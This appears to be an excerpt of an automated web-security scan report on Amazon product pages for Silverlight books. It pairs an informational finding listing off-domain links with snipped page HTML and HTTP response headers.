<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMuK3WTjek7KOD8NVFoBBdu6uW6-JS8A8u896NkYCvmleo0Gqy.5vXoBvuH8CY7FeSNAtCRln3wZe9N3fCPo7SwhW22qqztVAWq9L2iJYLEj5j5T2NAGW0eo4uZ4HJ3aeyQk109Q8bf3NiHTWk2ob9HDT1QazZviXO3-L61wOvvWWwcJLfiVXcYt5qr.R3bGboSfU06Jdoj0rz05yZgx.xioGH.hBDZSsI3kj-Fo50KJRQf947s6cJ3IbDr4mOKzFI.OQDHoTIQGX5gxGFYNh2osDvMJSgVN6iTesWCMfuEmSXHfy.os76iLrG1HbWcL67wBnVwNfm.wNHuHOwiVzSc3bR2YHhUKFQ.GDV8FDrMf6AnNOMDrew9GPR-ooQ7VGrDpmyvDW5k.UftNXlMVayrCdVvY0vpg87PH.MXXNv4FPxFS5ZmQnBEh3k5INLchw1sxx-IfOOpcGPkzJFKV-j0i7mox858W1Q__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMuK3WTjek7KOD8NVFoBBdu6uW6-JS8A8u896NkYCvmleo0Gqy.5vXoBvuH8CY7FeSNAtCRln3wZe9N3fCPo7SwhW22qqztVAWq9L2iJYLEj5j5T2NAGW0eo4uZ4HJ3aeyQk109Q8bf3NiHTWk2ob9HDT1QazZviXO3-L61wOvvWWwcJLfiVXcYt5qr.R3bGboSfU06Jdoj0rz05yZgx.xioGH.hBDZSsI3kj-Fo50KJRQf947s6cJ3IbDr4mOKzFI.OQDHoTIQGX5gxGFYNh2osDvMJSgVN6iTesWCMfuEmSXHfy.os76iLrG1HbWcL67wBnVwNfm.wNHuHOwiVzSc3bR2YHhUKFQ.GDV8FDrMf6AnNOMDrew9GPR-ooQ7VGrDpmyvDW5k.UftNXlMVayrCdVvY0vpg87PH.MXXNv4FPxFS5ZmQnBEh3k5INLchw1sxx-IfOOpcGPkzJFKV-j0i7mox858W1Q__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.componentone.com/freetrial</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AOHH48FUAXr-xwiPiAACFq.m5W9AVBHMTMhLRzWUhX01wkWWelr7vEZfVF85PjEhfPpdvAWGbYputjqEHcHqOUtRuhNR7nugFZRvHdoHupR5pwDc9eBUZUkiHGHO46pOFx6AYUHpsKMatWQaqYClpmnpWXJ-BVCesMu3HHJCSJkLskNfoktE84fsXHHjofsRe0lUoF2wiJhd-h-Frvz9AlukRFw2YzWdTCJEm7JUmFHk93lQflbgsIc4C3JNDV.mPxY.XPBi-tUfuocNcYRmtVxASdy6QBDX.RE9nEigQQryxRK-am.rpz6Dmlkix8IL3nupcpFeNpPJVwHSgAkI04X2CHE-OGghYUw2JTxx78oFa9Sp3IxCmF9rCbB6lFP8iLbLeWk0eODYblHuH1F9aKmZn3VLDfgrdd-1FCNoL7em3ff4OvA6qXxddfXsmIie-WCLByDbw6tUYBvynOi.jZahEqwdsiU3GVtN76rTbO0B&awt=1&s=" rel="nofollow"><b>Silverlight</b></a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AOHH48FUAXr-xwiPiAACFq.m5W9AVBHMTMhLRzWUhX01wkWWelr7vEZfVF85PjEhfPpdvAWGbYputjqEHcHqOUtRuhNR7nugFZRvHdoHupR5pwDc9eBUZUkiHGHO46pOFx6AYUHpsKMatWQaqYClpmnpWXJ-BVCesMu3HHJCSJkLskNfoktE84fsXHHjofsRe0lUoF2wiJhd-h-Frvz9AlukRFw2YzWdTCJEm7JUmFHk93lQflbgsIc4C3JNDV.mPxY.XPBi-tUfuocNcYRmtVxASdy6QBDX.RE9nEigQQryxRK-am.rpz6Dmlkix8IL3nupcpFeNpPJVwHSgAkI04X2CHE-OGghYUw2JTxx78oFa9Sp3IxCmF9rCbB6lFP8iLbLeWk0eODYblHuH1F9aKmZn3VLDfgrdd-1FCNoL7em3ff4OvA6qXxddfXsmIie-WCLByDbw6tUYBvynOi.jZahEqwdsiU3GVtN76rTbO0B&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AOHH48FUAXr-xwiPiAACFq.m5W9AVBHMTMhLRzWUhX01wkWWelr7vEZfVF85PjEhfPpdvAWGbYputjqEHcHqOUtRuhNR7nugFZRvHdoHupR5pwDc9eBUZUkiHGHO46pOFx6AYUHpsKMatWQaqYClpmnpWXJ-BVCesMu3HHJCSJkLskNfoktE84fsXHHjofsRe0lUoF2wiJhd-h-Frvz9AlukRFw2YzWdTCJEm7JUmFHk93lQflbgsIc4C3JNDV.mPxY.XPBi-tUfuocNcYRmtVxASdy6QBDX.RE9nEigQQryxRK-am.rpz6Dmlkix8IL3nupcpFeNpPJVwHSgAkI04X2CHE-OGghYUw2JTxx78oFa9Sp3IxCmF9rCbB6lFP8iLbLeWk0eODYblHuH1F9aKmZn3VLDfgrdd-1FCNoL7em3ff4OvA6qXxddfXsmIie-WCLByDbw6tUYBvynOi.jZahEqwdsiU3GVtN76rTbO0B&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">Microsoft.com/Web/WebMatrix</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJh.UIsAndPZ-tyA81vCehjSNOzA1sKz4Q2yyks0WIROJNFqYqbV9ia8jAvOaHR0iCv17z4V16fk75WoTP6fKXdZ3Pu7qsbaHhZkVyr7XRvqcr6Z-srM5fKKrPzM0wX8y-MEov1Fp6KQ3rWVKy9MJPXgF1EUTZ09M6Wo09bFNmpMmXkdFo82mw03phPVBGhoZzGw8jNTZEMI6QVyO3aPIXlG.9xmO762jHMRBDmoEQyzYWyfzqmSkdN1ltbkUzDa-JnxXGpAttsVXXBo-Q9Mcy0QdCSCFaDFUdSjV-YD-2zDUD7E0XudQ7tJNcKmfH9r0ysLd0BOQfWF3rBVypDgxFuXZ0JFFjhZR4KmX1r7zkdrm6mjTgkhbby9hzB2ab2rtOrENaYlXildaYS8eeOqG1nPydIcBh324YE1sBkgnf87pheezTjIQru-kSnipZrUO8S2HGg7UQ2PFjxNMq2MS6oHbjuGYyPB4mfmC4yMBAGzoXKWwkwDJ0LHCPhWO9ry-3wT-hv.bXnS&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJh.UIsAndPZ-tyA81vCehjSNOzA1sKz4Q2yyks0WIROJNFqYqbV9ia8jAvOaHR0iCv17z4V16fk75WoTP6fKXdZ3Pu7qsbaHhZkVyr7XRvqcr6Z-srM5fKKrPzM0wX8y-MEov1Fp6KQ3rWVKy9MJPXgF1EUTZ09M6Wo09bFNmpMmXkdFo82mw03phPVBGhoZzGw8jNTZEMI6QVyO3aPIXlG.9xmO762jHMRBDmoEQyzYWyfzqmSkdN1ltbkUzDa-JnxXGpAttsVXXBo-Q9Mcy0QdCSCFaDFUdSjV-YD-2zDUD7E0XudQ7tJNcKmfH9r0ysLd0BOQfWF3rBVypDgxFuXZ0JFFjhZR4KmX1r7zkdrm6mjTgkhbby9hzB2ab2rtOrENaYlXildaYS8eeOqG1nPydIcBh324YE1sBkgnf87pheezTjIQru-kSnipZrUO8S2HGg7UQ2PFjxNMq2MS6oHbjuGYyPB4mfmC4yMBAGzoXKWwkwDJ0LHCPhWO9ry-3wT-hv.bXnS&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJh.UIsAndPZ-tyA81vCehjSNOzA1sKz4Q2yyks0WIROJNFqYqbV9ia8jAvOaHR0iCv17z4V16fk75WoTP6fKXdZ3Pu7qsbaHhZkVyr7XRvqcr6Z-srM5fKKrPzM0wX8y-MEov1Fp6KQ3rWVKy9MJPXgF1EUTZ09M6Wo09bFNmpMmXkdFo82mw03phPVBGhoZzGw8jNTZEMI6QVyO3aPIXlG.9xmO762jHMRBDmoEQyzYWyfzqmSkdN1ltbkUzDa-JnxXGpAttsVXXBo-Q9Mcy0QdCSCFaDFUdSjV-YD-2zDUD7E0XudQ7tJNcKmfH9r0ysLd0BOQfWF3rBVypDgxFuXZ0JFFjhZR4KmX1r7zkdrm6mjTgkhbby9hzB2ab2rtOrENaYlXildaYS8eeOqG1nPydIcBh324YE1sBkgnf87pheezTjIQru-kSnipZrUO8S2HGg7UQ2PFjxNMq2MS6oHbjuGYyPB4mfmC4yMBAGzoXKWwkwDJ0LHCPhWO9ry-3wT-hv.bXnS&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.accusoft.com/<b>
...[SNIP]...
<a href="http://www.amazon.com/Professional-Silverlight-Wrox-Programmer/dp/0470650923/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Professional Silverlight 4 (Wrox Programmer to Programmer)" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-Data-Services-Cookbook/dp/1847199844/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Microsoft Silverlight 4 Data and Services Cookbook" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-Step/dp/073563887X/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Microsoft Silverlight 4 Step by Step (Step By Step (Microsoft))" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512N51%2BQbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading…" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Professional Silverlight 4 (Wrox Programmer to Programmer)" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1935182374" ><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_1430229799" ><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Pro Silverlight 4 in C#" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-Data-Services-Cookbook/dp/1847199844/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_1847199844" ><img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Microsoft Silverlight 4 Data and Services Cookbook" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&nodeId=518316">
...[SNIP]...
<td>


                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" /> Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?

    <b>
...[SNIP]...
<a href="/ref=footer_logo/179-7922704-8063117"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.372. http://www.amazon.com/gp/product/0672333368 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/gp/product/0672333368

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/gp/product/0672333368?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0672333368

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml
http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://ecx.images-amazon.com/images/I/41QizTXOm1L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg
http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg
http://ecx.images-amazon.com/images/I/41d0pgdYWpL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/41qFjxWqMpL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/41qFjxWqMpL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/512N51+QbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png
http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif
http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png
http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif
http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css
http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css
http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:33 GMT
Server: Server
x-amz-id-1: 04VBMFPBJXZ8J962J8W2
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: fH3WLv3Jzmox2K4JTSORqyP3dG78f8/Z57/rsvJ+e57X3LhuWxe1LUoVMzwVuNdD
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=185-0119564-6236271; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=Oel7bYwRWS1gKV5RSiNZiK5lZAAokMgjRBrE5HDUyc9ir04+EELG8B5ZvPf93p6q/Wug8LCjECLDGs1NV2Ss5CncqyEhzH4Xx7dc9WlLyukc31H5gDwd1M0N2+5dFhG9r9UQX7bBDo1UvRUWe9CKYp29GbQIzzh4/e34AfsAPvBx1HVvihnL6R0of1OO3HpDP4AGMQXekYYMU4xOPcaCZk0VUxYwQP/RumeAVnei2D4rad8Xugnf2lk0nqBj3rkP6vzCnoFEzmbe3GgDLzEstwODPn9gW6oauV3yNspeqzecQNyMXmsDy/UrRjAUYndEw91zCgoaiXhnp39HquunCVQJJv/M/EGP7xhqBuRl49vBAGLgp8yRAJwJEgmd86mQGKHoS1Ku4VfxXIMdaRhhkLOtFXZRjef7VWDgVqemNz4+2YF2kiCxAGs6W/ltnCEp33kcaW9Sa6E=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:33 2011 GMT
Content-Length: 386121

<html>
<head>

<style type="text/css">
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="bottomLeft">
<img src="http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png" id="kindleReaderSampleButton" style="cursor:pointer"/>
</td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=0672333368"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/0672333368/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Silverlight 4 Unleashed" onmouseover="" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Unleashed-Laurent-Bugnion/dp/0672333368/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Silverlight 4 Unleashed" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Silverlight 4 in Action" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Pro Silverlight 4 in C#" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41qFjxWqMpL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
